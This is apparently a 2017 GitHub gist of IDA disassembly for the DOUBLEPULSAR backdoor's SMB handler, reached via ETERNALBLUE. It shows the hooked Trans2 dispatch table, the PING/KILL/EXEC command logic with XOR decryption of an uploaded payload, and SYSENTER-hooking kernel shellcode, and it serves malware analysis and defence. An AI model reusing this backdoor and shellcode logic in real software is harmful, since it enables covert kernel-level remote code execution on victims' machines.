Skip to content

Instantly share code, notes, and snippets.

@msuiche

msuiche/EternalBlue-SmbHandler.asm

Created April 23, 2017 09:45
Show Gist options
  • Star 15 You must be signed in to star a gist
  • Fork 5 You must be signed in to fork a gist
  • Save msuiche/50a36710ee59709d8c76fa50fc987be1 to your computer and use it in GitHub Desktop.
Save msuiche/50a36710ee59709d8c76fa50fc987be1 to your computer and use it in GitHub Desktop.
Download ZIP
DOUBLEPULSAR - ETERNALBLUE - SmbHandler()
Raw
EternalBlue-SmbHandler.asm
Thanks to https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html#pulsar_step5 for the description
kd> dps srv!SrvTransaction2DispatchTable
91463530 9148b56f srv!SrvSmbOpen2
91463534 91485fe4 srv!SrvSmbFindFirst2
91463538 9148606d srv!SrvSmbFindNext2
9146353c 91488a89 srv!SrvSmbQueryFsInformation
91463540 914892f3 srv!SrvSmbSetFsInformation
91463544 9147ff65 srv!SrvSmbQueryPathInformation
91463548 91480c74 srv!SrvSmbSetPathInformation
9146354c 9147f77c srv!SrvSmbQueryFileInformation
91463550 9148055d srv!SrvSmbSetFileInformation
91463554 914894e5 srv!SrvSmbFindNotify
91463558 9148697a srv!SrvSmbIoctl2
9146355c 914894e5 srv!SrvSmbFindNotify
91463560 914894e5 srv!SrvSmbFindNotify
91463564 914815fb srv!SrvSmbCreateDirectory2
91463568 83f9f048 <====
9146356c 9148bf2b srv!SrvTransactionNotImplemented
91463570 91472107 srv!SrvSmbGetDfsReferral
91463574 91471ff7 srv!SrvSmbReportDfsInconsistency
91463578 00000000
.rdata:0041ACF5 ; =============== S U B R O U T I N E =======================================
.rdata:0041ACF5
.rdata:0041ACF5
.rdata:0041ACF5 SmbDoublePulsarHandler proc near
.rdata:0041ACF5
.rdata:0041ACF5 var_4 = dword ptr -4
.rdata:0041ACF5 arg_4 = dword ptr 8
.rdata:0041ACF5
.rdata:0041ACF5 mov ecx, [esp+arg_4]
.rdata:0041ACF9 pusha
.rdata:0041ACFA call $+5
.rdata:0041ACFF pop ebp
.rdata:0041AD00 and bp, 0F000h
.rdata:0041AD05 mov [ebp+34h], ecx
.rdata:0041AD08 call sub_41AEE6
.rdata:0041AD0D call sub_41AE55
.rdata:0041AD12 call sub_41AE96
.rdata:0041AD17 test eax, eax
.rdata:0041AD19 jz loc_41AE02
.rdata:0041AD1F mov ebx, [ebp+3Ch]
.rdata:0041AD22 mov ecx, [ebx-28h]
.rdata:0041AD25 call sub_41AE41
.rdata:0041AD2A cmp al, 23h ; PING
.rdata:0041AD2C jz short CMD_PING
.rdata:0041AD2E cmp al, 77h ; KILL
.rdata:0041AD30 jz short CMD_KILL
.rdata:0041AD32 cmp al, 0C8h ; EXEC
.rdata:0041AD34 jz short CMD_EXEC
.rdata:0041AD36 jmp CMD_INVALID
.rdata:0041AD3B ; ---------------------------------------------------------------------------
.rdata:0041AD3B
.rdata:0041AD3B CMD_PING: ; CODE XREF: SmbDoublePulsarHandler+37j
.rdata:0041AD3B mov ecx, [ebp+38h]
.rdata:0041AD3E mov eax, [ebp+24h]
.rdata:0041AD41 mov [ecx+0Eh], eax
.rdata:0041AD44 xor eax, eax
.rdata:0041AD46 mov [ecx+12h], al
.rdata:0041AD49 jmp PING
.rdata:0041AD4E ; ---------------------------------------------------------------------------
.rdata:0041AD4E
.rdata:0041AD4E CMD_KILL: ; CODE XREF: SmbDoublePulsarHandler+3Bj
.rdata:0041AD4E call EraseCode
.rdata:0041AD53 jmp KILL
.rdata:0041AD58 ; ---------------------------------------------------------------------------
.rdata:0041AD58
.rdata:0041AD58 CMD_EXEC: ; CODE XREF: SmbDoublePulsarHandler+3Fj
.rdata:0041AD58 mov ebx, [ebp+3Ch]
.rdata:0041AD5B mov eax, [ebx-18h]
.rdata:0041AD5E mov esi, [eax]
.rdata:0041AD60 xor esi, [ebp+28h]
.rdata:0041AD63 mov edi, [eax+8]
.rdata:0041AD66 xor edi, [ebp+28h]
.rdata:0041AD69 mov eax, [eax+4]
.rdata:0041AD6C xor eax, [ebp+28h]
.rdata:0041AD6F cmp eax, [ebx+10h]
.rdata:0041AD72 mov ebx, eax
.rdata:0041AD74 jnz short CMD_INVALID
.rdata:0041AD76 mov ecx, [ebp+30h]
.rdata:0041AD79 cmp ecx, esi
.rdata:0041AD7B mov eax, [ebp+2Ch]
.rdata:0041AD7E jz short loc_41AD98
.rdata:0041AD80 call sub_41AE77
.rdata:0041AD85 lea eax, [esi+4]
.rdata:0041AD88 push eax
.rdata:0041AD89 push 0
.rdata:0041AD8B call dword ptr [ebp+8]
.rdata:0041AD8E test eax, eax
.rdata:0041AD90 jz short loc_41ADF5
.rdata:0041AD92 mov [ebp+2Ch], eax
.rdata:0041AD95 mov [ebp+30h], esi
.rdata:0041AD98
.rdata:0041AD98 loc_41AD98: ; CODE XREF: SmbDoublePulsarHandler+89j
.rdata:0041AD98 add edi, ebx
.rdata:0041AD9A cmp edi, esi
.rdata:0041AD9C ja short CMD_INVALID
.rdata:0041AD9E sub edi, ebx
.rdata:0041ADA0 add edi, eax
.rdata:0041ADA2 push edi
.rdata:0041ADA3 mov edx, esi
.rdata:0041ADA5 mov esi, [ebp+3Ch]
.rdata:0041ADA8 mov esi, [esi-10h]
.rdata:0041ADAB mov ecx, ebx
.rdata:0041ADAD rep movsb
.rdata:0041ADAF pop esi
.rdata:0041ADB0 mov ecx, ebx
.rdata:0041ADB2 shr ecx, 2
.rdata:0041ADB5 mov ebx, [ebp+28h]
.rdata:0041ADB8
.rdata:0041ADB8 loc_41ADB8: ; CODE XREF: SmbDoublePulsarHandler+C8j
.rdata:0041ADB8 xor [esi], ebx
.rdata:0041ADBA add esi, 4
.rdata:0041ADBD loop loc_41ADB8
.rdata:0041ADBF add eax, edx
.rdata:0041ADC1 cmp esi, eax
.rdata:0041ADC3 jl short PING
.rdata:0041ADC5 mov eax, [ebp+2Ch]
.rdata:0041ADC8 pusha
.rdata:0041ADC9 mov esi, esp
.rdata:0041ADCB push eax
.rdata:0041ADCC call eax
.rdata:0041ADCE mov esp, esi
.rdata:0041ADD0 popa
.rdata:0041ADD1 call sub_41AE77
.rdata:0041ADD6 mov eax, [ebp+24h]
.rdata:0041ADD9 shr eax, 1
.rdata:0041ADDB xor ecx, ecx
.rdata:0041ADDD mov cl, al
.rdata:0041ADDF add ecx, ebp
.rdata:0041ADE1 mov ecx, [ecx]
.rdata:0041ADE3 xor eax, ecx
.rdata:0041ADE5 mov [ebp+24h], eax
.rdata:0041ADE8 call sub_41AE55
.rdata:0041ADED
.rdata:0041ADED PING: ; CODE XREF: SmbDoublePulsarHandler+54j
.rdata:0041ADED ; SmbDoublePulsarHandler+CEj
.rdata:0041ADED mov al, 10h
.rdata:0041ADEF jmp short CleanUp
.rdata:0041ADF1 ; ---------------------------------------------------------------------------
.rdata:0041ADF1
.rdata:0041ADF1 CMD_INVALID: ; CODE XREF: SmbDoublePulsarHandler+41j
.rdata:0041ADF1 ; SmbDoublePulsarHandler+7Fj ...
.rdata:0041ADF1 mov al, 20h
.rdata:0041ADF3 jmp short CleanUp
.rdata:0041ADF5 ; ---------------------------------------------------------------------------
.rdata:0041ADF5
.rdata:0041ADF5 loc_41ADF5: ; CODE XREF: SmbDoublePulsarHandler+9Bj
.rdata:0041ADF5 mov al, 30h
.rdata:0041ADF7 jmp short $+2
.rdata:0041ADF9 ; ---------------------------------------------------------------------------
.rdata:0041ADF9
.rdata:0041ADF9 CleanUp: ; CODE XREF: SmbDoublePulsarHandler+FAj
.rdata:0041ADF9 ; SmbDoublePulsarHandler+FEj ...
.rdata:0041ADF9 mov ecx, [ebp+38h]
.rdata:0041ADFC mov ah, 0
.rdata:0041ADFE add [ecx+1Eh], ax
.rdata:0041AE02
.rdata:0041AE02 loc_41AE02: ; CODE XREF: SmbDoublePulsarHandler+24j
.rdata:0041AE02 mov eax, [ebp+10h]
.rdata:0041AE05 mov [esp+20h+var_4], eax
.rdata:0041AE09 popa
.rdata:0041AE0A jmp dword ptr [eax+3Ch]
.rdata:0041AE0D ; ---------------------------------------------------------------------------
.rdata:0041AE0D
.rdata:0041AE0D KILL: ; CODE XREF: SmbDoublePulsarHandler+5Ej
.rdata:0041AE0D lea eax, [ebp+48h]
.rdata:0041AE10 mov ecx, [ebp+0Ch]
.rdata:0041AE13 mov [eax+147h], ecx
.rdata:0041AE19 mov [eax+13Eh], ebp
.rdata:0041AE1F mov ax, 10h
.rdata:0041AE23 mov ecx, [ebp+38h]
.rdata:0041AE26 add [ecx+1Eh], ax
.rdata:0041AE2A mov eax, [ebp+10h]
.rdata:0041AE2D mov [esp+20h+var_4], eax
.rdata:0041AE31 popa
.rdata:0041AE32 push 0
.rdata:0041AE37 mov eax, [eax+3Ch]
.rdata:0041AE3A push eax
.rdata:0041AE3B push 0
.rdata:0041AE40 retn
.rdata:0041AE40 SmbDoublePulsarHandler endp
.rdata:0041AE40
.rdata:0041AE41
.rdata:0041AE41 ; =============== S U B R O U T I N E =======================================
.rdata:0041AE41
.rdata:0041AE41
.rdata:0041AE41 sub_41AE41 proc near ; CODE XREF: SmbDoublePulsarHandler+30p
.rdata:0041AE41 xor eax, eax
.rdata:0041AE43 mov al, cl
.rdata:0041AE45 shr ecx, 8
.rdata:0041AE48 add al, cl
.rdata:0041AE4A shr ecx, 8
.rdata:0041AE4D add al, cl
.rdata:0041AE4F shr ecx, 8
.rdata:0041AE52 add al, cl
.rdata:0041AE54 retn
.rdata:0041AE54 sub_41AE41 endp
.rdata:0041AE54
.rdata:0041AE55
.rdata:0041AE55 ; =============== S U B R O U T I N E =======================================
.rdata:0041AE55
.rdata:0041AE55
.rdata:0041AE55 sub_41AE55 proc near ; CODE XREF: SmbDoublePulsarHandler+18p
.rdata:0041AE55 ; SmbDoublePulsarHandler+F3p
.rdata:0041AE55 push ecx
.rdata:0041AE56 mov eax, [ebp+24h]
.rdata:0041AE59 mov ecx, eax
.rdata:0041AE5B bswap ecx
.rdata:0041AE5D shl eax, 1
.rdata:0041AE5F xor eax, ecx
.rdata:0041AE61 mov [ebp+28h], eax
.rdata:0041AE64 pop ecx
.rdata:0041AE65 retn
.rdata:0041AE65 sub_41AE55 endp
.rdata:0041AE65
.rdata:0041AE66
.rdata:0041AE66 ; =============== S U B R O U T I N E =======================================
.rdata:0041AE66
.rdata:0041AE66
.rdata:0041AE66 EraseCode proc near ; CODE XREF: SmbDoublePulsarHandler:CMD_KILLp
.rdata:0041AE66 pusha
.rdata:0041AE67 call sub_41AE77
.rdata:0041AE6C mov eax, [ebp+10h]
.rdata:0041AE6F mov ecx, [eax+3Ch]
.rdata:0041AE72 mov [eax+38h], ecx
.rdata:0041AE75 popa
.rdata:0041AE76 retn
.rdata:0041AE76 EraseCode endp
.rdata:0041AE76
.rdata:0041AE77
.rdata:0041AE77 ; =============== S U B R O U T I N E =======================================
.rdata:0041AE77
.rdata:0041AE77
.rdata:0041AE77 sub_41AE77 proc near ; CODE XREF: SmbDoublePulsarHandler+8Bp
.rdata:0041AE77 ; SmbDoublePulsarHandler+DCp ...
.rdata:0041AE77 pusha
.rdata:0041AE78 mov ebx, [ebp+2Ch]
.rdata:0041AE7B test ebx, ebx
.rdata:0041AE7D jz short loc_41AE8C
.rdata:0041AE7F xor eax, eax
.rdata:0041AE81 mov edi, ebx
.rdata:0041AE83 mov ecx, [ebp+30h]
.rdata:0041AE86 rep stosb
.rdata:0041AE88 push ebx
.rdata:0041AE89 call dword ptr [ebp+0Ch]
.rdata:0041AE8C
.rdata:0041AE8C loc_41AE8C: ; CODE XREF: sub_41AE77+6j
.rdata:0041AE8C xor eax, eax
.rdata:0041AE8E mov [ebp+30h], eax
.rdata:0041AE91 mov [ebp+2Ch], eax
.rdata:0041AE94 popa
.rdata:0041AE95 retn
.rdata:0041AE95 sub_41AE77 endp
.rdata:0041AE95
.rdata:0041AE96
.rdata:0041AE96 ; =============== S U B R O U T I N E =======================================
.rdata:0041AE96
.rdata:0041AE96
.rdata:0041AE96 sub_41AE96 proc near ; CODE XREF: SmbDoublePulsarHandler+1Dp
.rdata:0041AE96 push edi
.rdata:0041AE97 push edx
.rdata:0041AE98 push esi
.rdata:0041AE99 mov edi, ecx
.rdata:0041AE9B mov edx, [ebp+44h]
.rdata:0041AE9E mov ecx, [edx]
.rdata:0041AEA0 call sub_41AEDE
.rdata:0041AEA5 test eax, eax
.rdata:0041AEA7 jnz short loc_41AEB7
.rdata:0041AEA9 add edx, 8
.rdata:0041AEAC mov ecx, [edx]
.rdata:0041AEAE call sub_41AEDE
.rdata:0041AEB3 test eax, eax
.rdata:0041AEB5 jz short loc_41AED8
.rdata:0041AEB7
.rdata:0041AEB7 loc_41AEB7: ; CODE XREF: sub_41AE96+11j
.rdata:0041AEB7 mov [ebp+44h], ecx
.rdata:0041AEBA push 0Ch
.rdata:0041AEBC pop eax
.rdata:0041AEBD lea esi, [ecx+54h]
.rdata:0041AEC0 cmp eax, [esi]
.rdata:0041AEC2 jz short loc_41AECB
.rdata:0041AEC4 add esi, 4
.rdata:0041AEC7 cmp eax, [esi]
.rdata:0041AEC9 jnz short loc_41AED8
.rdata:0041AECB
.rdata:0041AECB loc_41AECB: ; CODE XREF: sub_41AE96+2Cj
.rdata:0041AECB cmp eax, [esi+4]
.rdata:0041AECE jnz short loc_41AED8
.rdata:0041AED0 mov [ebp+3Ch], esi
.rdata:0041AED3 xor eax, eax
.rdata:0041AED5 inc eax
.rdata:0041AED6 jmp short loc_41AEDA
.rdata:0041AED8 ; ---------------------------------------------------------------------------
.rdata:0041AED8
.rdata:0041AED8 loc_41AED8: ; CODE XREF: sub_41AE96+1Fj
.rdata:0041AED8 ; sub_41AE96+33j ...
.rdata:0041AED8 xor eax, eax
.rdata:0041AEDA
.rdata:0041AEDA loc_41AEDA: ; CODE XREF: sub_41AE96+40j
.rdata:0041AEDA pop esi
.rdata:0041AEDB pop edx
.rdata:0041AEDC pop edi
.rdata:0041AEDD retn
.rdata:0041AEDD sub_41AE96 endp
.rdata:0041AEDD
.rdata:0041AEDE
.rdata:0041AEDE ; =============== S U B R O U T I N E =======================================
.rdata:0041AEDE
.rdata:0041AEDE
.rdata:0041AEDE sub_41AEDE proc near ; CODE XREF: sub_41AE96+Ap
.rdata:0041AEDE ; sub_41AE96+18p
.rdata:0041AEDE xor eax, eax
.rdata:0041AEE0 cmp ecx, eax
.rdata:0041AEE2 jge short locret_41AEE5
.rdata:0041AEE4 inc eax
.rdata:0041AEE5
.rdata:0041AEE5 locret_41AEE5: ; CODE XREF: sub_41AEDE+4j
.rdata:0041AEE5 retn
.rdata:0041AEE5 sub_41AEDE endp
.rdata:0041AEE5
.rdata:0041AEE6
.rdata:0041AEE6 ; =============== S U B R O U T I N E =======================================
.rdata:0041AEE6
.rdata:0041AEE6
.rdata:0041AEE6 sub_41AEE6 proc near ; CODE XREF: SmbDoublePulsarHandler+13p
.rdata:0041AEE6 push edx
.rdata:0041AEE7 push ecx
.rdata:0041AEE8 xor edx, edx
.rdata:0041AEEA mov dx, [ecx+2]
.rdata:0041AEEE add edx, ecx
.rdata:0041AEF0
.rdata:0041AEF0 loc_41AEF0: ; CODE XREF: sub_41AEE6+11j
.rdata:0041AEF0 cmp edx, [ecx]
.rdata:0041AEF2 jz short loc_41AEF9
.rdata:0041AEF4 add ecx, 4
.rdata:0041AEF7 jmp short loc_41AEF0
.rdata:0041AEF9 ; ---------------------------------------------------------------------------
.rdata:0041AEF9
.rdata:0041AEF9 loc_41AEF9: ; CODE XREF: sub_41AEE6+Cj
.rdata:0041AEF9 pop edx
.rdata:0041AEFA lea eax, [ecx+1Ch]
.rdata:0041AEFD add eax, 7
.rdata:0041AF00 and al, 0F8h
.rdata:0041AF02 mov [ebp+44h], eax
.rdata:0041AF05 mov eax, [ecx-8]
.rdata:0041AF08 mov [ebp+38h], eax
.rdata:0041AF0B mov ecx, edx
.rdata:0041AF0D pop edx
.rdata:0041AF0E retn
.rdata:0041AF0E sub_41AEE6 endp
.rdata:0041AF0E
@msuiche
Copy link
Author

msuiche commented Apr 23, 2017 

.data:0041EDE8 kernelHandler:                          ; DATA XREF: AddKernelHandlers+20E�o
.data:0041EDE8                 xor     eax, eax
.data:0041EDEA                 inc     eax
.data:0041EDEB                 nop
.data:0041EDEC                 jz      short _Is64Bits
.data:0041EDEE                 call    _continue_32bits
.data:0041EDF3                 retn    24h
.data:0041EDF6 ; ---------------------------------------------------------------------------
.data:0041EDF6
.data:0041EDF6 _Is64Bits:                              ; CODE XREF: .data:0041EDEC�j
.data:0041EDF6                 call    loc_41EEA2
.data:0041EDFB                 retn
.data:0041EDFC
.data:0041EDFC ; =============== S U B R O U T I N E =======================================
.data:0041EDFC
.data:0041EDFC
.data:0041EDFC _continue_32bits proc near              ; CODE XREF: .data:0041EDEE�p
.data:0041EDFC                 call    GetEip
.data:0041EDFC ; ---------------------------------------------------------------------------
.data:0041EE01                 db 0EBh ; d
.data:0041EE02 ; ---------------------------------------------------------------------------
.data:0041EE02
.data:0041EE02 GetEip:                                 ; CODE XREF: _continue_32bits�j
.data:0041EE02                 nop
.data:0041EE03                 pop     ebx
.data:0041EE04                 mov     ecx, 176h       ; IA32_SYSENTER_EIP
.data:0041EE09                 rdmsr
.data:0041EE0B                 mov     ds:0FFDFFFFCh, eax
.data:0041EE10                 lea     eax, [ebx+17h]  ; Sysenter_EIP()
.data:0041EE13                 xor     edx, edx
.data:0041EE15                 wrmsr
.data:0041EE17                 retn
.data:0041EE17 _continue_32bits endp ; sp-analysis failed
.data:0041EE17
.data:0041EE18
.data:0041EE18 ; =============== S U B R O U T I N E =======================================
.data:0041EE18
.data:0041EE18
.data:0041EE18 Sysenter_EIP    proc near
.data:0041EE18
.data:0041EE18 var_33          = byte ptr -33h
.data:0041EE18
.data:0041EE18                 mov     ecx, 23h
.data:0041EE1D                 push    30h
.data:0041EE1F                 pop     fs
.data:0041EE21                 mov     ds, ecx
.data:0041EE23                 mov     es, ecx
.data:0041EE25                 mov     ecx, large fs:40h
.data:0041EE2C                 mov     esp, [ecx+4]
.data:0041EE2F                 push    dword ptr ds:0FFDFFFFCh
.data:0041EE35                 pusha
.data:0041EE36                 pushf
.data:0041EE37                 push    23h
.data:0041EE39                 push    edx
.data:0041EE3A                 pushf
.data:0041EE3B                 push    2
.data:0041EE3D                 add     edx, 8
.data:0041EE40                 popf
.data:0041EE41                 or      [esp+34h+var_33], 2
.data:0041EE46                 push    1Bh
.data:0041EE48                 push    dword ptr ds:0FFDF0304h
.data:0041EE4E                 push    0
.data:0041EE50                 push    ebp
.data:0041EE51                 push    ebx
.data:0041EE52                 push    esi
.data:0041EE53                 push    edi
.data:0041EE54                 mov     ebx, large fs:1Ch
.data:0041EE5B                 push    3Bh
.data:0041EE5D                 mov     esi, [ebx+124h]
.data:0041EE63                 push    dword ptr [ebx]
.data:0041EE65                 xor     eax, eax
.data:0041EE67                 dec     eax
.data:0041EE68                 mov     [ebx], eax
.data:0041EE6A                 mov     ebp, [esi+28h]
.data:0041EE6D                 push    1
.data:0041EE6F                 sub     esp, 48h
.data:0041EE72                 sub     ebp, 29Ch
.data:0041EE78                 mov     eax, ds:0FFDFFFFCh
.data:0041EE7D                 mov     ecx, 176h
.data:0041EE82                 xor     edx, edx
.data:0041EE84                 wrmsr
.data:0041EE86                 sti
.data:0041EE87                 call    loc_41EE9D
.data:0041EE8C                 cli
.data:0041EE8D                 mov     ecx, large fs:40h
.data:0041EE94                 mov     esp, [ecx+4]
.data:0041EE97                 sub     esp, 28h
.data:0041EE9A                 popf
.data:0041EE9B                 popa
.data:0041EE9C                 retn
.data:0041EE9C Sysenter_EIP    endp ; sp-analysis failed

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment